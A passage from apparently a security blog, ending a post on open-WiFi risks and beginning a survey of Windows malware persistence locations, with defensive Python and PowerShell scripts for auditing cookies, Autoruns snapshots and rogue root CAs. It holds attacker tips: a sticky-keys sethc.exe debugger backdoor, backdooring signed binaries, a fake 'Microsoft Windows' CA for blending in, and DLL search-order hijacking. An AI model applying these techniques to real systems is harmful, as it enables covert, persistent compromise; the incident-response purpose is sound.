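    ("Content-Type", "text/html"),
    ("Set-Cookie", "PHPSESSID=0123456789abcdef; Path=/"),
    ("Set-Cookie", "lang=en; Path=/; Secure"),
]
HARDENED_RESPONSE: List[Header] = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "PHPSESSID=0123456789abcdef; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ("Set-Cookie", "lang=en; Path=/; Secure; HttpOnly"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains; preload"),
]

if __name__ == "__main__":
    for label, headers in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(headers) or ["no findings"])
```

<div style="text-align: justify;">
The weak response produces four findings (the session cookie lacks both flags, the language cookie lacks HttpOnly, and there is no HSTS at all), the hardened one produces none. A missing Secure flag is exactly the precondition for risk 1 above, and a missing or short HSTS policy is what SSLStrip-style downgrades (risk 3) rely on.</div>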
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Asking “Are you using open WiFi?” or “Do you do online banking on open WiFi?” is asking the wrong questions. The good questions are:</div>
<ul>
<li style="text-align: justify;">Do you trust the operator(s) of the network you are using?</li>
<li style="text-align: justify;">Are the clients separated?</li>
<li style="text-align: justify;">If clients are not separated, is it possible that there are people with malicious intent on the network?</li>
<li style="text-align: justify;">Are you security-aware, and are you following the rules previously mentioned? If you do follow these rules, those will protect you on whatever network you are.</li>
</ul>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
And call me an idiot, but I do online banking, e-shopping, and all the other sensitive stuff while I’m using open WiFi. And whenever I order pizza from an HTTP website, attackers can learn my address. Which is already in the phone book, on Facebook, and in the metadata of every photo of my cat that I took with my smartphone and uploaded to the Internet (<a href="http://iknowwhereyourcatlives.com/">http://iknowwhereyourcatlives.com/</a>).</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0JNhkLWPeUvOfdUxiz98JGrLJxiy_iLcb-BBjpJRXQa0lAPZ4wPWNriwU-0isZ4GHKJl2uR_qSsq4hd36MPjixK7QAeBZyOu7zpLqdDFhnSmu8V6aV9mgXOTP5JANvVTJWilOBJD-sdpT/s1600/cat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0JNhkLWPeUvOfdUxiz98JGrLJxiy_iLcb-BBjpJRXQa0lAPZ4wPWNriwU-0isZ4GHKJl2uR_qSsq4hd36MPjixK7QAeBZyOu7zpLqdDFhnSmu8V6aV9mgXOTP5JANvVTJWilOBJD-sdpT/s320/cat.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
Most articles and research publications are full of FUD about what people can learn from others. Maybe they are just outdated, maybe they are not. But it is totally safe to use Gmail on an open WiFi; no one will be able to read my e-mails.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
PS: I know “Average Joe” won’t find my blog post, won’t start to read it, and won’t understand half of what I wrote. But even if they do, they won’t patch their browser plugins, pay for a VPN, or check the session cookie. So they are doomed to fail. That’s life. Deal with it.</div>
<div>
<br /></div>
<h1>Many ways of malware persistence (that you were always afraid to ask)</h1>
<div>Published 2015-05-05, updated 2019-10-08</div>
<div style="text-align: justify;">
TL;DR: Are you into red teaming? Need persistence? This post is not that long, read it ;)</div>
<div style="text-align: justify;">
Are you into blue teaming? Have to find those pesky backdoors? This post is not that long, read it ;)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In the <a href="http://jumpespjump.blogspot.com/2015/03/thousand-ways-to-backdoor-windows.html" target="_blank">previous post</a>, I listed different ways a Windows domain/forest can be backdoored. In this new post, I am digging a bit deeper, and list the most common/known ways malware can survive a reboot, using just the local resources of the infected Windows system. The list is far from complete, and I would like to encourage everyone to comment on new methods not yet listed here. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
From an incident response point of view, one of the best strategies to find malware on a suspicious system is to search for suspicious entries that start with the system. In the good old days, you had to check for 2-3 locations to cover 99% of the infections. Nowadays, there are a thousand ways malware can start. The common ones automatically start whenever Windows starts (or the user logs in), but some tricky ones are triggered by other events.</div>
<div style="text-align: justify;">
<br /></div>
<div>
<h2 style="text-align: justify;">
Autoruns</h2>
<div>
<div style="text-align: justify;">
My favorite choice when it comes to malware persistence is the Sysinternals tool Autoruns. In this paragraph, I mainly quote the official built-in help, but bear with me, it is still interesting.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
On a side note, there are some problems with the Autoruns tool: it can only run on a live system. (EDIT: This is not true, Autoruns can analyze offline systems as well! Thanks to a comment from Justin.) And usually, this is not the case - I usually have dd images. And although VBoxManage can convert the dd images to VirtualBox disk image format, usually I don't have the time and storage to do that. This is where xmount comes to the rescue. It can convert dd and Encase images on-the-fly, in memory, to VirtualBox format. Just attach the disk image to a new VirtualBox machine as the main boot HDD, modify the CPU/disk/controller settings until Windows starts instead of crashing, and voila, you can boot your forensic image - without modifying a single bit of the original evidence dd file. Another problem with malware analysis on a live system is that a good rootkit can fool the analyst easily. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For quick wins, I usually filter out Microsoft entries, look at per-user locations only, and check for unverified (missing or invalid Authenticode signature) executables. This usually helps to find 90% of malware easily. Entries that Autoruns highlights in a color like purple or pink are especially suspicious. To find the rest, well, one has to dig deeper.</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9taiP1e0q6Zq-HVqhGDUlfCctvKXwndbJ45fGDzW6DuyJ8xLLo3lbrOGW9hqqdKlaKxsKES2NqgEAyVdpQzjFhBEX8Jf3LGku_Dc2ixFPazcfmmx_Xk2kChGza6Xxp8HW7Q9j9FRSeAH4/s1600/zeus1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9taiP1e0q6Zq-HVqhGDUlfCctvKXwndbJ45fGDzW6DuyJ8xLLo3lbrOGW9hqqdKlaKxsKES2NqgEAyVdpQzjFhBEX8Jf3LGku_Dc2ixFPazcfmmx_Xk2kChGza6Xxp8HW7Q9j9FRSeAH4/s1600/zeus1.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Zeus "hiding" in the usual random directory - check the faked timestamp</td></tr>
</tbody></table>
<div style="text-align: justify;">
To implement "poor man's monitoring", regularly save the output of Autoruns; during incident response, it will be highly valuable. A how-to guide is available <a href="http://www.sans.org/reading-room/whitepapers/malicious/utilizing-autoruns-catch-malware-33383" target="_blank">here</a>.<br />
<br /></div>
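<div style="text-align: justify;">
What that monitoring looks like in practice, as an added example (my script, not a Sysinternals tool and not code from the post): two saved Autoruns CSV exports are diffed, and every entry that appeared or whose image, launch string or signer changed is triaged with the quick-win heuristics from the paragraph above, namely an unverified Authenticode signer, a per-user location (HKCU/HKU hives or an AppData image path), and an Image Hijacks entry (the IFEO debugger trick discussed further down). The column names follow the autorunsc CSV export; both snapshots are constructed samples, including a tampered copy of a system tray executable, a per-user Run key, and a sethc.exe debugger entry.</div>

```python
import csv
import io
from typing import Dict, List, Tuple

Key = Tuple[str, str, str]  # (Entry Location, Entry, Profile)


def load_snapshot(csv_text: str) -> Dict[Key, dict]:
    # Index one saved Autoruns CSV export by location, entry name and profile.
    # Rows are accessed by column name, so an extra leading Time column
    # (present in newer autorunsc builds) does no harm.
    snapshot: Dict[Key, dict] = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        snapshot[(row["Entry Location"], row["Entry"], row["Profile"])] = row
    return snapshot


def triage(row: dict) -> List[str]:
    # Quick-win heuristics: unverified Authenticode signer, per-user
    # location, and Image File Execution Options (debugger) hijacks.
    reasons = []
    if not row["Signer"].startswith("(Verified)"):
        reasons.append("unverified signer")
    location = row["Entry Location"].upper()
    if location.startswith(("HKCU\\", "HKU\\")) or "\\APPDATA\\" in row["Image Path"].upper():
        reasons.append("per-user location")
    if row["Category"] == "Image Hijacks":
        reasons.append("IFEO debugger hijack")
    return reasons


def fingerprint(row: dict) -> Tuple[str, str, str]:
    return (row["Image Path"], row["Launch String"], row["Signer"])


def report(baseline_csv: str, current_csv: str) -> List[dict]:
    # Report every entry that is new or changed since the baseline, with reasons.
    old = load_snapshot(baseline_csv)
    new = load_snapshot(current_csv)
    findings = []
    for key, row in new.items():
        if key not in old:
            status = "added"
        elif fingerprint(old[key]) != fingerprint(row):
            status = "changed"
        else:
            continue
        findings.append({"location": key[0], "entry": key[1],
                         "status": status, "reasons": triage(row)})
    return findings


# Constructed snapshots (not real exports); column names follow autorunsc.
HEADER = "Entry Location,Entry,Enabled,Category,Profile,Description,Signer,Company,Image Path,Version,Launch String\n"
BASELINE_CSV = HEADER + r"""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SecurityHealth,enabled,Logon,System-wide,Windows Security notification icon,(Verified) Microsoft Windows,Microsoft Corporation,c:\windows\system32\securityhealthsystray.exe,10.0.19041.1,%windir%\system32\SecurityHealthSystray.exe
HKLM\System\CurrentControlSet\Services,Spooler,enabled,Services,System-wide,Print Spooler,(Verified) Microsoft Windows,Microsoft Corporation,c:\windows\system32\spoolsv.exe,10.0.19041.1,C:\Windows\System32\spoolsv.exe
"""
CURRENT_CSV = HEADER + r"""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SecurityHealth,enabled,Logon,System-wide,Windows Security notification icon,(Not verified) Microsoft Windows,Microsoft Corporation,c:\programdata\securityhealthsystray.exe,10.0.19041.1,C:\ProgramData\SecurityHealthSystray.exe
HKLM\System\CurrentControlSet\Services,Spooler,enabled,Services,System-wide,Print Spooler,(Verified) Microsoft Windows,Microsoft Corporation,c:\windows\system32\spoolsv.exe,10.0.19041.1,C:\Windows\System32\spoolsv.exe
HKCU\Software\Microsoft\Windows\CurrentVersion\Run,wkmgr,enabled,Logon,EXAMPLE\alice,,(Not verified) Unknown,,c:\users\alice\appdata\roaming\kfha\wkmgr.exe,,C:\Users\alice\AppData\Roaming\kfha\wkmgr.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options,sethc.exe,enabled,Image Hijacks,System-wide,Windows Command Processor,(Verified) Microsoft Windows,Microsoft Corporation,c:\windows\system32\cmd.exe,10.0.19041.1,cmd.exe
"""

if __name__ == "__main__":
    for finding in report(BASELINE_CSV, CURRENT_CSV):
        print(f"{finding['status']:8} {finding['entry']:16} {finding['location']}  ->  {', '.join(finding['reasons']) or 'no heuristic hit'}")
```

<div style="text-align: justify;">
On these samples the unchanged Spooler service is not reported, the replaced SecurityHealth image is reported as changed with an unverified signer (a backdoored binary breaks the original signature, as the last section of this post notes), the per-user Run entry hits two heuristics, and the sethc.exe debugger entry is caught by its category alone even though the image it points to is a legitimately signed cmd.exe.</div>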
</div>
<h3 style="text-align: justify;">
Logon</h3>
<div>
<div style="text-align: justify;">
"This entry results in scans of standard autostart locations such as the Startup
folder for the current user and all users, the Run Registry keys, and standard
application launch locations." </div>
</div>
<div>
<div style="text-align: justify;">
There are 42 registry keys/folders at the moment in Autoruns which can be used to autostart malware. The most common ones are the HKCU\Software\Microsoft\Windows\CurrentVersion\Run key and the C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup folder.</div>
<div style="text-align: justify;">
One of my favorites regarding this topic is the <a href="https://blog.gdatasoftware.com/blog/article/poweliks-the-persistent-malware-without-a-file.html" target="_blank">file-less Poweliks malware</a>, 100% pure awesomeness. Typical ring 3 code execution.<br />
<br /></div>
</div>
<h3 style="text-align: justify;">
Explorer</h3>
<div>
<div style="text-align: justify;">
"Select this entry to see Explorer shell extensions, browser helper objects, explorer toolbars, active setup executions, and shell execute hooks". 71 registry keys, OMG. Usually, this is not about auto-malware execution, but some of them might be a good place to hide malware.<br />
<br /></div>
</div>
<h3 style="text-align: justify;">
Internet explorer</h3>
<div>
<div style="text-align: justify;">
"This entry shows Browser Helper Objects (BHO's), Internet Explorer toolbars and extensions". 13 registry keys here. If a malicious BHO is installed into your browser, you are pretty much screwed.</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><img align="middle" border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBf0Uw_Z0AfDEs7rEXGgI3bsjoaL5KFYQlwyZ3FYBWRU-kkYIvcmEEjcRsoeEuGpYEMorFrCJu7l_ozQb_MFsPZHV2yFn81rQwMPqTfFcHhbOeS5zK5ZV-fw2G5kqA0haIMFF-SrcCSnap/s1600/IE_pwn3d.jpg" width="400" /></td></tr>
</tbody></table>
<div style="text-align: justify;">
<br /></div>
</div>
<h3 style="text-align: justify;">
Scheduled tasks</h3>
<div>
<div style="text-align: justify;">
"Task scheduler tasks configured to start at boot or logon." Not commonly used, but it is important to look at this.</div>
<div style="text-align: justify;">
I always thought this part of the autostart entries is quite boring, but nowadays, I think it is one of the best ways to hide your malware. There are so many entries here by default, and some of them can use quite good tricks to trigger the start.</div>
<div style="text-align: justify;">
Did you know that you can create custom events that <a href="http://blakhal0.blogspot.com/2015/03/windows-event-log-driven-back-doors.html" target="_blank">trigger on Windows event logs</a>?</div>
<div style="text-align: justify;">
Did you know you can create <a href="http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html" target="_blank">malware persistence just by using Windows tools</a> like bitsadmin and Scheduled tasks?</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqSPOBYm3OmDPWMe6W2pG-VeZepZuLuK05qtMlFvveWiOAQ3nW2v0LbCB0ofVoYhCeVZA1NB32MwGqUJwKkmDHRs2BJ7yZHWmbvBpactzxkMRuKAy9A0THluLMOKCXYiHoOc_ovvAxnYr0/s1600/sched2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqSPOBYm3OmDPWMe6W2pG-VeZepZuLuK05qtMlFvveWiOAQ3nW2v0LbCB0ofVoYhCeVZA1NB32MwGqUJwKkmDHRs2BJ7yZHWmbvBpactzxkMRuKAy9A0THluLMOKCXYiHoOc_ovvAxnYr0/s1600/sched2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Scheduler in the old days</td></tr>
</tbody></table>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmX_zKgCWH8Dftdr9OmxgPiM9raTxj2U5eYq-1a5yRVJX0mUGqR5eDhOc01T5PmpFKUX7a4_FTMz1uvURpvbUVjMLi5F2uSR3j3iobKUg1u3Kewv6j-IDcvAvflLvQ-XXlv_NSqTq4S4P0/s1600/sched.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmX_zKgCWH8Dftdr9OmxgPiM9raTxj2U5eYq-1a5yRVJX0mUGqR5eDhOc01T5PmpFKUX7a4_FTMz1uvURpvbUVjMLi5F2uSR3j3iobKUg1u3Kewv6j-IDcvAvflLvQ-XXlv_NSqTq4S4P0/s1600/sched.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Scheduler in the new days</td></tr>
</tbody></table>
<div style="text-align: justify;">
<br /></div>
</div>
<h3 style="text-align: justify;">
Services</h3>
<div>
<div style="text-align: justify;">
HKLM\System\CurrentControlSet\Services is a very common place to hide malware, especially rootkits. Check all entries with special care.<br />
<br /></div>
</div>
<h3 style="text-align: justify;">
Drivers</h3>
<div>
<div style="text-align: justify;">
Same as services. A very common place for rootkits. Unfortunately (for the attacker), signing a driver for 64-bit systems is not fun anymore, as it has to be signed by certificates that can be chained back to "<a href="https://msdn.microsoft.com/en-us/library/windows/hardware/dn170454(v=vs.85).aspx" target="_blank">Software Publisher Certificates</a>". Typical startup place for Ring 0 rootkits. </div>
<div style="text-align: justify;">
Starting from Windows 10, even this will change and all drivers have to be signed by "<a href="http://blogs.msdn.com/b/windows_hardware_certification/archive/2015/04/01/driver-signing-changes-in-windows-10.aspx" target="_blank">Windows Hardware Developer Center Dashboard portal</a>" and EV certificates.<br />
<br /></div>
</div>
<h3 style="text-align: justify;">
Codecs</h3>
<div>
<div style="text-align: justify;">
22 registry keys. Not very common, but possible code execution.<br />
<br /></div>
</div>
<h3 style="text-align: justify;">
Boot execute</h3>
<div style="text-align: justify;">
"Native images (as opposed to Windows images) that run early during the boot process."</div>
<div style="text-align: justify;">
5 registry keys here. Good place to hide a rootkit here.<br />
<br /></div>
<h3 style="text-align: justify;">
Image hijacks</h3>
<div style="text-align: justify;">
"Image file execution options and command prompt autostarts." 13 registry keys here. I believe this was originally intended for debugging purposes.</div>
<div style="text-align: justify;">
This is where the good-old sticky keys trick is hiding. It is a bit different from the others, as it provides backdoor access, but you can (usually) only use it from the local network. The trick is to execute your code whenever someone presses the SHIFT key multiple times before logging in via RDP. The old way was to replace sethc.exe, the new fun is to <a href="http://www.labofapenetrationtester.com/2012/05/fun-with-sticky-keys-utilman-and.html" target="_blank">set a debug program on sethc</a>. </div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEbhM_EWAItCibjzc09JWjT3RxaYpQFettrw2GlaV5uOY2DgimREgv7fnckeSiIsiKQkkdUEW7D8TLrMRhse-oI9E0evnxatAcYmIEc_o71BJSm6lKavppgqZKzYUdwo_OOmG2YdpCtji6/s1600/sethc.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="108" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEbhM_EWAItCibjzc09JWjT3RxaYpQFettrw2GlaV5uOY2DgimREgv7fnckeSiIsiKQkkdUEW7D8TLrMRhse-oI9E0evnxatAcYmIEc_o71BJSm6lKavppgqZKzYUdwo_OOmG2YdpCtji6/s1600/sethc.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">If you see this, you are in trouble</td></tr>
</tbody></table>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
AppInit</h3>
<div style="text-align: justify;">
"This has Autoruns shows DLLs registered as application initialization DLLs." Only 3 registry keys here. This is the good old way to inject a malicious DLL into Explorer, browsers, etc. Luckily it is going to be deprecated soon.<br />
<br /></div>
<h3 style="text-align: justify;">
Known DLLs</h3>
<div style="text-align: justify;">
"This reports the location of DLLs that Windows loads into applications that reference them." Only 1 registry key. This might be used to hijack some system DLLs.<br />
<br /></div>
<h3 style="text-align: justify;">
Winlogon</h3>
<div style="text-align: justify;">
"Shows DLLs that register for Winlogon notification of logon events." 7 registry keys. Sometimes used by malware.<br />
<br /></div>
<h3 style="text-align: justify;">
Winsock providers</h3>
<div style="text-align: justify;">
"Shows registered Winsock protocols, including Winsock service providers. Malware often installs itself as a Winsock service provider because there are few tools that can remove them. Autoruns can disable them, but cannot delete them." 4 registry keys. AFAIK this was trendy a while ago. But still, a good place to hide malware.<br />
<br /></div>
<h3 style="text-align: justify;">
Print monitors</h3>
<div>
<div style="text-align: justify;">
"Displays DLLs that load into the print spooling service. Malware has used this support to autostart itself." 1 registry key. Some malware writers are quite creative when it comes to hiding their persistence module.<br />
<br /></div>
</div>
<h3 style="text-align: justify;">
LSA providers</h3>
<div>
<div style="text-align: justify;">
"Shows registers Local Security Authority (LSA) authentication, notification and security packages." 5 registry keys. A good place to hide your password stealer. <br />
<br /></div>
</div>
<h3 style="text-align: justify;">
Network providers</h3>
<div>
<div style="text-align: justify;">
"Missing documentation". If you have a good one-sentence description, please comment.<br />
<br /></div>
</div>
<h3 style="text-align: justify;">
WMI filters</h3>
<div>
<div style="text-align: justify;">
"Missing documentation". Check <a href="https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_There's_Something_About_WMI.pdf" target="_blank">Mandiant </a>for details.<br />
<br /></div>
</div>
<h3 style="text-align: justify;">
Sidebar gadgets</h3>
<div>
<div style="text-align: justify;">
Thank god MS disabled this a while ago :)</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt_ebi9lZXVgCZRiSXRZR95nHkxKf3wgrR2GpiNZ2ld5IGSAryVrnD6mB8oe9cugw0_dhs8lqtjCfp746S97VKOHwqCe57f8mBu_JzTfmve0OP-ucX0Pju4CJQA0pbGfBfhKyjIpwmK1Nj/s1600/coolest-best-latest-new-fun-tech-gadgets-sidebar-gadgets-2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt_ebi9lZXVgCZRiSXRZR95nHkxKf3wgrR2GpiNZ2ld5IGSAryVrnD6mB8oe9cugw0_dhs8lqtjCfp746S97VKOHwqCe57f8mBu_JzTfmve0OP-ucX0Pju4CJQA0pbGfBfhKyjIpwmK1Nj/s1600/coolest-best-latest-new-fun-tech-gadgets-sidebar-gadgets-2.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">We all miss you, you crappy resource gobble nightmares</td></tr>
</tbody></table>
<div style="text-align: justify;">
<br /></div>
</div>
<h2>
</h2>
<h2>
</h2>
<h2 style="text-align: justify;">
Common ways - not in autoruns</h2>
<div>
<div style="text-align: justify;">
Now, let's see other possibilities to start your malware, which won't be listed in Sysinternals Autoruns.<br />
<br /></div>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Backdoor an executable/DLL</h3>
</div>
<div>
<div style="text-align: justify;">
Just change the code of an executable which is either auto-starting or commonly started by the user. To avoid lame mistakes, disable the update of the file ... <a href="https://github.com/secretsquirrel/the-backdoor-factory" target="_blank">The backdoor factory</a> is a good source for this task. But if you backdoor an executable/DLL which is already listed in Autoruns, you will break the digital signature on the file. It is recommended to sign your executable, and if you can't afford to steal a trusted certificate, you can still import your own CA into the user's trusted certificate store (with user privileges), and it will look like a trusted one. Protip: use "Microsoft Windows" as the name of the code-signing CA, and your executable will blend in.</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnmFzY3NVz-LF9C1GQNdGaiI1Lt_2Mcwkk_6m2xPNZC4yFmyOjU0n1nfW59LduSCnxU7X8IUvXVzumeUxpMT_mWvyPwB173GiPzK3skT9qmNARVkeSVSXzWIF23lQh8HejfzwN47yPZGfA/s1600/cert3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img align="middle" border="0" height="144" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnmFzY3NVz-LF9C1GQNdGaiI1Lt_2Mcwkk_6m2xPNZC4yFmyOjU0n1nfW59LduSCnxU7X8IUvXVzumeUxpMT_mWvyPwB173GiPzK3skT9qmNARVkeSVSXzWIF23lQh8HejfzwN47yPZGfA/s1600/cert3.png" width="320" /></a></td></tr>
<tr><td style="text-align: center;"></td></tr>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQrmUznu3zBiK_JfjnoIkV36r81wbbZQehM1_j1511K3pgJuXoBEDMrOkdm4UjJblbQnv9N7tx0jk3ZBDkJyorM93y0hYYum0SZPnw_yr1OANiP-W7GUKAJhrKljMBzJgj5Kc6UPxHc4Z-/s1600/certs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img align="middle" border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQrmUznu3zBiK_JfjnoIkV36r81wbbZQehM1_j1511K3pgJuXoBEDMrOkdm4UjJblbQnv9N7tx0jk3ZBDkJyorM93y0hYYum0SZPnw_yr1OANiP-W7GUKAJhrKljMBzJgj5Kc6UPxHc4Z-/s1600/certs.png" width="318" /></a></td></tr>
<tr><td style="text-align: center;"></td></tr>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdpoS8HZ-FaKX5N5zAgrQXEXmM20PkxCFVxEsmLFs9m5eQv__pjOTIzo5IEDp7f8RSbV5yPyu9RobPD8ZEJd-G2aUGLb7qs5Wk6SdmIiDfrk-P6ELRriObacXwBNztvrlS85KDXU79ZCU0/s1600/cert2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="72" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdpoS8HZ-FaKX5N5zAgrQXEXmM20PkxCFVxEsmLFs9m5eQv__pjOTIzo5IEDp7f8RSbV5yPyu9RobPD8ZEJd-G2aUGLb7qs5Wk6SdmIiDfrk-P6ELRriObacXwBNztvrlS85KDXU79ZCU0/s1600/cert2.png" width="640" /></a></td></tr>
</tbody></table>
See, rootkit.exe totally looks legit, and it is filtered out when someone filters for "Hide Windows entries".<br />
<br />
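<div style="text-align: justify;">
A defender-side check for the trick above, added here as an example (not code from the original post): it lists root CAs that are trusted only in the current user's store, and then finds signed files whose certificate chain ends at one of them. The Microsoft-name heuristic and the directory to scan are assumptions.</div>
```powershell
# Added example, not code from the original post. Lists root CAs that are
# trusted only for the current user (in Cert:\CurrentUser\Root but not in
# Cert:\LocalMachine\Root) and finds signed files whose chain ends at one of
# them. A per-user-only root is exactly what "import your own CA with user
# privileges" leaves behind, and a Microsoft-looking name is the blend-in case.

function Get-UserOnlyRootCA {
    $machineThumbprints = Get-ChildItem -Path Cert:\LocalMachine\Root |
        Select-Object -ExpandProperty Thumbprint

    Get-ChildItem -Path Cert:\CurrentUser\Root |
        Where-Object { $machineThumbprints -notcontains $_.Thumbprint } |
        ForEach-Object {
            [PSCustomObject]@{
                Subject            = $_.Subject
                Thumbprint         = $_.Thumbprint
                NotBefore          = $_.NotBefore
                NotAfter           = $_.NotAfter
                # Heuristic (assumed): self-signed and named after Microsoft.
                LooksLikeMicrosoft = ($_.Subject -eq $_.Issuer) -and ($_.Subject -match 'Microsoft')
            }
        }
}

function Get-FileSignedByUserOnlyRoot {
    param(
        [Parameter(Mandatory)][string]$Directory,   # e.g. $env:USERPROFILE
        [string[]]$UserOnlyThumbprints = @(Get-UserOnlyRootCA | Select-Object -ExpandProperty Thumbprint)
    )
    if ($UserOnlyThumbprints.Count -eq 0) { return }

    Get-ChildItem -Path $Directory -Recurse -File -Include *.exe, *.dll -ErrorAction SilentlyContinue |
        ForEach-Object {
            $sig = Get-AuthenticodeSignature -FilePath $_.FullName
            # Unsigned or broken signatures are a separate finding; here we only
            # care about signatures that look valid because of a user-scoped root.
            if ($sig.Status -ne 'Valid' -or -not $sig.SignerCertificate) { return }

            $chain = New-Object System.Security.Cryptography.X509Certificates.X509Chain
            $null = $chain.Build($sig.SignerCertificate)
            $rootThumbprint = $chain.ChainElements[$chain.ChainElements.Count - 1].Certificate.Thumbprint
            $chain.Reset()

            if ($UserOnlyThumbprints -contains $rootThumbprint) {
                [PSCustomObject]@{
                    File   = $_.FullName
                    Signer = $sig.SignerCertificate.Subject
                    Root   = $rootThumbprint
                }
            }
        }
}

# Usage:
# Get-UserOnlyRootCA | Format-Table -AutoSize
# Get-FileSignedByUserOnlyRoot -Directory $env:USERPROFILE | Format-Table -AutoSize
```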
<div>
<div style="text-align: justify;">
<span style="background-color: yellow;"><br /></span></div>
</div>
<div>
<h3>
</h3>
<h3 style="text-align: justify;">
Hijack DLL load order</h3>
</div>
<div>
<div style="text-align: justify;">
Just place your DLL into a directory which is searched before the one holding the original DLL, and PROFIT! But again, to avoid lame detection, be sure to proxy the legitimate function calls to the original DLL. Good sources on this topic: <a href="https://www.mandiant.com/blog/dll-search-order-hijacking-revisited/" target="_blank">Mandiant</a> and the <a href="http://digital-forensics.sans.org/blog/2015/03/25/detecting-dll-hijacking-on-windows/" target="_blank">DLL hijack detector</a>.<br />
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
